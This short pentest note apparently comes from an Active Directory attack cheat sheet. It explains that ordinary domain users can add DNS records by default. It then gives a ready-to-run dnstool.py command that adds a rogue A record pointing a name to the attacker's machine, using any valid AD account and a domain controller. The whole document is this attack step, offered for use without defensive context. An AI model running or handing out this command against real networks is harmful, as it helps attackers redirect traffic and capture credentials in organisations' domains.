dnstool.py
This script helps you add DNS records to the domain (which members of Domain Users
can by default):
Add a rogue DNS record that points to your attacking box
dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER